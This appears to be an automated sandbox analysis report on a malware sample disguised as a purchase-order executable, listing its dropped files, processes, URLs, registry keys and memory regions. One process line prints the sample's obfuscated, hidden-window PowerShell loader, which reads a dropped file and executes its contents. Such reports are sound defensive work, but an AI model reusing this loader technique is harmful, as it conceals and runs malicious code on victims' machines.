Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
PURCHASE_ORDER-IET-2195-2024.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Premonopolies\Kuplende.Aer
|
ASCII text, with very long lines (3023), with CRLF, LF line terminators
|
dropped
|
|
|
|
C:\Program Files (x86)\Common Files\Glued.lnk
|
MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun
Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Kommandomode.Apo
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Premonopolies\byrge.txt
|
ASCII text, with very long lines (422), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Premonopolies\fremfaerden.bla
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Premonopolies\selvstndighedstrang.bil
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Premonopolies\tidsskriftartiklerne.hyp
|
Matlab v4 mat-file (little endian) $, numeric, rows 0, columns 180
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\Cloud Setting.ini
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2smg3gkx.51s.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h5zr3co5.0rl.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n14b5ga5.hcp.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sf2fdvpo.jhi.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\nse64E1.tmp
|
data
|
dropped
|
There are 5 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\PURCHASE_ORDER-IET-2195-2024.exe
|
"C:\Users\user\Desktop\PURCHASE_ORDER-IET-2195-2024.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Conhydrin=Get-Content -Raw 'C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Premonopolies\Kuplende.Aer';$Triquetral86=$Conhydrin.SubString(52634,3);.$Triquetral86($Conhydrin)"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\dxdiag.exe
|
"C:\Windows\syswow64\dxdiag.exe"
|
|
|
|
C:\Windows\SysWOW64\dxdiag.exe
|
"C:\Windows\syswow64\dxdiag.exe"
|
|
|
|
C:\Windows\SysWOW64\dxdiag.exe
|
"C:\Windows\syswow64\dxdiag.exe"
|
|
|
|
C:\Windows\SysWOW64\dxdiag.exe
|
"C:\Windows\syswow64\dxdiag.exe"
|
|
|
|
C:\Windows\SysWOW64\dxdiag.exe
|
"C:\Windows\syswow64\dxdiag.exe"
|
|
|
|
C:\Windows\SysWOW64\dxdiag.exe
|
"C:\Windows\syswow64\dxdiag.exe"
|
|
|
|
C:\Windows\SysWOW64\dxdiag.exe
|
"C:\Windows\syswow64\dxdiag.exe"
|
|
|
|
C:\Windows\SysWOW64\dxdiag.exe
|
"C:\Windows\syswow64\dxdiag.exe"
|
|
|
|
C:\Windows\SysWOW64\dxdiag.exe
|
"C:\Windows\syswow64\dxdiag.exe"
|
|
|
|
C:\Windows\SysWOW64\dxdiag.exe
|
"C:\Windows\syswow64\dxdiag.exe"
|
|
|
|
C:\Windows\SysWOW64\dxdiag.exe
|
"C:\Windows\syswow64\dxdiag.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\dxdiag.exe
|
"C:\Windows\syswow64\dxdiag.exe"
|
|
|
|
C:\Windows\SysWOW64\dxdiag.exe
|
"C:\Windows\syswow64\dxdiag.exe"
|
|
|
|
C:\Windows\SysWOW64\dxdiag.exe
|
"C:\Windows\syswow64\dxdiag.exe"
|
|
|
|
C:\Windows\SysWOW64\dxdiag.exe
|
"C:\Windows\syswow64\dxdiag.exe"
|
|
|
|
C:\Windows\SysWOW64\dxdiag.exe
|
"C:\Windows\syswow64\dxdiag.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 29 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
There are 1 hidden URLs, click here to show them.
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\smrers\Rovfisk55
|
Unsobering
|
||
|
HKEY_CURRENT_USER\subtilly\Codicillary\Diipenates
|
Dolt
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
AF26000
|
direct allocation
|
page execute and read and write
|
|
|
|
23E0000
|
heap
|
page read and write
|
||
|
82AD000
|
stack
|
page read and write
|
||
|
19A000
|
stack
|
page read and write
|
||
|
864D000
|
heap
|
page read and write
|
||
|
5DC1000
|
trusted library allocation
|
page read and write
|
||
|
77A0000
|
trusted library allocation
|
page read and write
|
||
|
77C0000
|
trusted library allocation
|
page read and write
|
||
|
77D0000
|
trusted library allocation
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
606000
|
heap
|
page read and write
|
||
|
3250000
|
trusted library allocation
|
page read and write
|
||
|
8200000
|
heap
|
page read and write
|
||
|
75B0000
|
trusted library allocation
|
page read and write
|
||
|
7110000
|
heap
|
page read and write
|
||
|
4760000
|
trusted library allocation
|
page read and write
|
||
|
7750000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D60000
|
direct allocation
|
page read and write
|
||
|
8717000
|
heap
|
page read and write
|
||
|
81F4000
|
stack
|
page read and write
|
||
|
459000
|
unkown
|
page readonly
|
||
|
8560000
|
trusted library allocation
|
page read and write
|
||
|
48CE000
|
stack
|
page read and write
|
||
|
851E000
|
stack
|
page read and write
|
||
|
638000
|
heap
|
page read and write
|
||
|
2DB0000
|
heap
|
page read and write
|
||
|
7600000
|
trusted library allocation
|
page read and write
|
||
|
75C7000
|
trusted library allocation
|
page read and write
|
||
|
218E000
|
stack
|
page read and write
|
||
|
459000
|
unkown
|
page readonly
|
||
|
5F68000
|
trusted library allocation
|
page read and write
|
||
|
4D8E000
|
stack
|
page read and write
|
||
|
53DD000
|
trusted library allocation
|
page read and write
|
||
|
427000
|
unkown
|
page read and write
|
||
|
8390000
|
trusted library allocation
|
page read and write
|
||
|
2A0000
|
direct allocation
|
page read and write
|
||
|
74A2000
|
heap
|
page read and write
|
||
|
88F000
|
stack
|
page read and write
|
||
|
4DC1000
|
trusted library allocation
|
page read and write
|
||
|
76CF000
|
stack
|
page read and write
|
||
|
5FE000
|
heap
|
page read and write
|
||
|
5DE9000
|
trusted library allocation
|
page read and write
|
||
|
7770000
|
trusted library allocation
|
page read and write
|
||
|
73C0000
|
heap
|
page read and write
|
||
|
9B26000
|
direct allocation
|
page execute and read and write
|
||
|
89A0000
|
trusted library allocation
|
page read and write
|
||
|
2C86000
|
heap
|
page read and write
|
||
|
8673000
|
heap
|
page read and write
|
||
|
2E3A000
|
heap
|
page read and write
|
||
|
451000
|
unkown
|
page read and write
|
||
|
5FF000
|
heap
|
page read and write
|
||
|
73B2000
|
heap
|
page read and write
|
||
|
47A0000
|
heap
|
page read and write
|
||
|
2C60000
|
heap
|
page read and write
|
||
|
4CCE000
|
stack
|
page read and write
|
||
|
774D000
|
stack
|
page read and write
|
||
|
2DDC000
|
heap
|
page read and write
|
||
|
454000
|
unkown
|
page readonly
|
||
|
768E000
|
stack
|
page read and write
|
||
|
313F000
|
stack
|
page read and write
|
||
|
743C000
|
heap
|
page read and write
|
||
|
85C0000
|
trusted library allocation
|
page read and write
|
||
|
435000
|
unkown
|
page read and write
|
||
|
77E0000
|
trusted library allocation
|
page read and write
|
||
|
51E000
|
stack
|
page read and write
|
||
|
73A4000
|
heap
|
page read and write
|
||
|
879E000
|
heap
|
page read and write
|
||
|
8614000
|
heap
|
page read and write
|
||
|
30000
|
direct allocation
|
page read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
34EC000
|
stack
|
page read and write
|
||
|
4750000
|
trusted library allocation
|
page read and write
|
||
|
2130000
|
heap
|
page read and write
|
||
|
84D0000
|
trusted library allocation
|
page read and write
|
||
|
9030000
|
trusted library allocation
|
page execute and read and write
|
||
|
4F17000
|
trusted library allocation
|
page read and write
|
||
|
8260000
|
heap
|
page read and write
|
||
|
8300000
|
trusted library allocation
|
page execute and read and write
|
||
|
8210000
|
trusted library allocation
|
page execute and read and write
|
||
|
8641000
|
heap
|
page read and write
|
||
|
8820000
|
trusted library allocation
|
page execute and read and write
|
||
|
8567000
|
trusted library allocation
|
page read and write
|
||
|
856B000
|
trusted library allocation
|
page read and write
|
||
|
8345000
|
trusted library allocation
|
page read and write
|
||
|
8570000
|
trusted library allocation
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
8812000
|
trusted library allocation
|
page read and write
|
||
|
770E000
|
stack
|
page read and write
|
||
|
7380000
|
heap
|
page read and write
|
||
|
488C000
|
stack
|
page read and write
|
||
|
4700000
|
trusted library section
|
page read and write
|
||
|
786C000
|
stack
|
page read and write
|
||
|
237F000
|
stack
|
page read and write
|
||
|
47A9000
|
heap
|
page read and write
|
||
|
623000
|
heap
|
page read and write
|
||
|
7790000
|
trusted library allocation
|
page read and write
|
||
|
61D000
|
heap
|
page read and write
|
||
|
9060000
|
direct allocation
|
page execute and read and write
|
||
|
431000
|
unkown
|
page read and write
|
||
|
4C8E000
|
stack
|
page read and write
|
||
|
75D0000
|
trusted library allocation
|
page read and write
|
||
|
50000
|
direct allocation
|
page read and write
|
||
|
57E8000
|
trusted library allocation
|
page read and write
|
||
|
98000
|
stack
|
page read and write
|
||
|
4765000
|
trusted library allocation
|
page execute and read and write
|
||
|
295C000
|
stack
|
page read and write
|
||
|
57FE000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
direct allocation
|
page read and write
|
||
|
5F58000
|
trusted library allocation
|
page read and write
|
||
|
75E0000
|
trusted library allocation
|
page read and write
|
||
|
606000
|
heap
|
page read and write
|
||
|
2D80000
|
direct allocation
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
7800000
|
trusted library allocation
|
page read and write
|
||
|
89B0000
|
trusted library allocation
|
page read and write
|
||
|
9050000
|
direct allocation
|
page execute and read and write
|
||
|
5F6D000
|
trusted library allocation
|
page read and write
|
||
|
5C8000
|
heap
|
page read and write
|
||
|
473D000
|
trusted library allocation
|
page execute and read and write
|
||
|
863D000
|
heap
|
page read and write
|
||
|
2C50000
|
direct allocation
|
page read and write
|
||
|
7F028000
|
trusted library allocation
|
page execute and read and write
|
||
|
638000
|
heap
|
page read and write
|
||
|
400000
|
direct allocation
|
page read and write
|
||
|
82F0000
|
heap
|
page read and write
|
||
|
30C0000
|
heap
|
page read and write
|
||
|
282F000
|
stack
|
page read and write
|
||
|
98F000
|
stack
|
page read and write
|
||
|
8630000
|
heap
|
page read and write
|
||
|
2260000
|
heap
|
page read and write
|
||
|
8830000
|
trusted library allocation
|
page execute and read and write
|
||
|
6E50000
|
direct allocation
|
page read and write
|
||
|
4838000
|
trusted library allocation
|
page read and write
|
||
|
8691000
|
heap
|
page read and write
|
||
|
30E0000
|
heap
|
page read and write
|
||
|
7640000
|
trusted library allocation
|
page read and write
|
||
|
2DE8000
|
heap
|
page read and write
|
||
|
48D0000
|
heap
|
page read and write
|
||
|
B926000
|
direct allocation
|
page execute and read and write
|
||
|
8612000
|
heap
|
page read and write
|
||
|
47EE000
|
stack
|
page read and write
|
||
|
422000
|
unkown
|
page read and write
|
||
|
2D70000
|
direct allocation
|
page read and write
|
||
|
2C20000
|
direct allocation
|
page read and write
|
||
|
30E8000
|
heap
|
page read and write
|
||
|
61D000
|
heap
|
page read and write
|
||
|
575000
|
heap
|
page read and write
|
||
|
21EE000
|
stack
|
page read and write
|
||
|
2C80000
|
heap
|
page read and write
|
||
|
4749000
|
trusted library allocation
|
page read and write
|
||
|
4790000
|
heap
|
page readonly
|
||
|
53DB000
|
trusted library allocation
|
page read and write
|
||
|
23E4000
|
heap
|
page read and write
|
||
|
73F2000
|
heap
|
page read and write
|
||
|
6DFD000
|
stack
|
page read and write
|
||
|
A526000
|
direct allocation
|
page execute and read and write
|
||
|
84D5000
|
trusted library allocation
|
page read and write
|
||
|
23BE000
|
stack
|
page read and write
|
||
|
8649000
|
heap
|
page read and write
|
||
|
7120000
|
heap
|
page read and write
|
||
|
570000
|
heap
|
page read and write
|
||
|
5FEA000
|
trusted library allocation
|
page read and write
|
||
|
37B0000
|
trusted library allocation
|
page read and write
|
||
|
2850000
|
heap
|
page read and write
|
||
|
8230000
|
trusted library allocation
|
page read and write
|
||
|
602000
|
heap
|
page read and write
|
||
|
75F0000
|
trusted library allocation
|
page read and write
|
||
|
4780000
|
trusted library allocation
|
page read and write
|
||
|
8724000
|
heap
|
page read and write
|
||
|
8370000
|
trusted library allocation
|
page read and write
|
||
|
8720000
|
heap
|
page read and write
|
||
|
77B0000
|
trusted library allocation
|
page read and write
|
||
|
4A6000
|
unkown
|
page readonly
|
||
|
4E24000
|
trusted library allocation
|
page read and write
|
||
|
5A0000
|
heap
|
page read and write
|
||
|
482E000
|
stack
|
page read and write
|
||
|
4740000
|
trusted library allocation
|
page read and write
|
||
|
23C0000
|
heap
|
page read and write
|
||
|
3250000
|
trusted library allocation
|
page read and write
|
||
|
33AE000
|
stack
|
page read and write
|
||
|
4733000
|
trusted library allocation
|
page execute and read and write
|
||
|
34AF000
|
stack
|
page read and write
|
||
|
8754000
|
heap
|
page read and write
|
||
|
85B0000
|
trusted library allocation
|
page read and write
|
||
|
42F000
|
unkown
|
page read and write
|
||
|
7F010000
|
trusted library allocation
|
page execute and read and write
|
||
|
D726000
|
direct allocation
|
page execute and read and write
|
||
|
7760000
|
trusted library allocation
|
page read and write
|
||
|
5C0000
|
heap
|
page read and write
|
||
|
602000
|
heap
|
page read and write
|
||
|
733E000
|
stack
|
page read and write
|
||
|
6E60000
|
direct allocation
|
page read and write
|
||
|
2837000
|
heap
|
page read and write
|
||
|
89C0000
|
heap
|
page read and write
|
||
|
CD26000
|
direct allocation
|
page execute and read and write
|
||
|
2E4C000
|
heap
|
page read and write
|
||
|
86FA000
|
heap
|
page read and write
|
||
|
4DB0000
|
heap
|
page execute and read and write
|
||
|
48D7000
|
heap
|
page read and write
|
||
|
454000
|
unkown
|
page readonly
|
||
|
2DB8000
|
heap
|
page read and write
|
||
|
2C40000
|
direct allocation
|
page read and write
|
||
|
4C30000
|
trusted library allocation
|
page read and write
|
||
|
494000
|
unkown
|
page readonly
|
||
|
42B000
|
unkown
|
page read and write
|
||
|
737E000
|
stack
|
page read and write
|
||
|
4710000
|
trusted library section
|
page read and write
|
||
|
4734000
|
trusted library allocation
|
page read and write
|
||
|
20000
|
direct allocation
|
page read and write
|
||
|
82EF000
|
stack
|
page read and write
|
||
|
35ED000
|
stack
|
page read and write
|
||
|
4D0000
|
heap
|
page read and write
|
||
|
9126000
|
direct allocation
|
page execute and read and write
|
||
|
9040000
|
trusted library allocation
|
page execute and read and write
|
||
|
855E000
|
stack
|
page read and write
|
||
|
2998000
|
stack
|
page read and write
|
||
|
2C30000
|
direct allocation
|
page read and write
|
||
|
6F45000
|
heap
|
page execute and read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
5A5000
|
heap
|
page read and write
|
||
|
579000
|
heap
|
page read and write
|
||
|
7780000
|
trusted library allocation
|
page read and write
|
||
|
8645000
|
heap
|
page read and write
|
||
|
56E000
|
stack
|
page read and write
|
||
|
2C10000
|
heap
|
page read and write
|
||
|
8707000
|
heap
|
page read and write
|
||
|
8778000
|
heap
|
page read and write
|
||
|
85A0000
|
trusted library allocation
|
page read and write
|
||
|
7820000
|
trusted library allocation
|
page read and write
|
||
|
4730000
|
trusted library allocation
|
page read and write
|
||
|
2E46000
|
heap
|
page read and write
|
||
|
75A0000
|
heap
|
page execute and read and write
|
||
|
2270000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
7810000
|
trusted library allocation
|
page read and write
|
||
|
4A6000
|
unkown
|
page readonly
|
||
|
6F40000
|
heap
|
page execute and read and write
|
||
|
8380000
|
trusted library allocation
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
83A0000
|
trusted library allocation
|
page read and write
|
||
|
77F0000
|
trusted library allocation
|
page read and write
|
||
|
742E000
|
heap
|
page read and write
|
||
|
8618000
|
heap
|
page read and write
|
||
|
5E29000
|
trusted library allocation
|
page read and write
|
||
|
8610000
|
heap
|
page read and write
|
||
|
73D0000
|
heap
|
page read and write
|
||
|
494000
|
unkown
|
page readonly
|
||
|
4720000
|
trusted library allocation
|
page read and write
|
||
|
874A000
|
heap
|
page read and write
|
||
|
75C0000
|
trusted library allocation
|
page read and write
|
||
|
2B0000
|
direct allocation
|
page read and write
|
||
|
520000
|
heap
|
page read and write
|
||
|
C326000
|
direct allocation
|
page execute and read and write
|
||
|
8850000
|
trusted library allocation
|
page read and write
|
||
|
5F50000
|
trusted library allocation
|
page read and write
|
||
|
8220000
|
trusted library allocation
|
page read and write
|
||
|
86A1000
|
heap
|
page read and write
|
||
|
40A000
|
unkown
|
page read and write
|
||
|
4C20000
|
trusted library allocation
|
page execute and read and write
|
||
|
8639000
|
heap
|
page read and write
|
||
|
475A000
|
trusted library allocation
|
page execute and read and write
|
||
|
4762000
|
trusted library allocation
|
page read and write
|
There are 252 hidden memdumps, click here to show them.